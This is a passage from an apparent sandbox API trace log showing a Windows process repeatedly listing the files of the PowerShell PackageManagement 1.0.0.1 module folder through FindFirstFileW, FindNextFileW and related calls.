(dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8a5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.565] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8a820 | out: lpFindFileData=0x653ef8a820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.565] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.565] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.565] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.566] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.566] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.566] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.566] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.568] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.568] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.568] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.568] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8a5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.569] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8a820 | out: lpFindFileData=0x653ef8a820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.569] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.569] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.569] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.571] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.571] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.571] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.571] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.571] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.572] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8a6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab20) returned 1 [0281.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ac00 | out: lpFileInformation=0x653ef8ac00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aae0) returned 1 [0281.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab70) returned 1 [0281.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8a650, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.572] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8a880 | out: lpFindFileData=0x653ef8a880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.573] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.573] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.573] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.573] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.574] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.574] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.574] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.574] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, 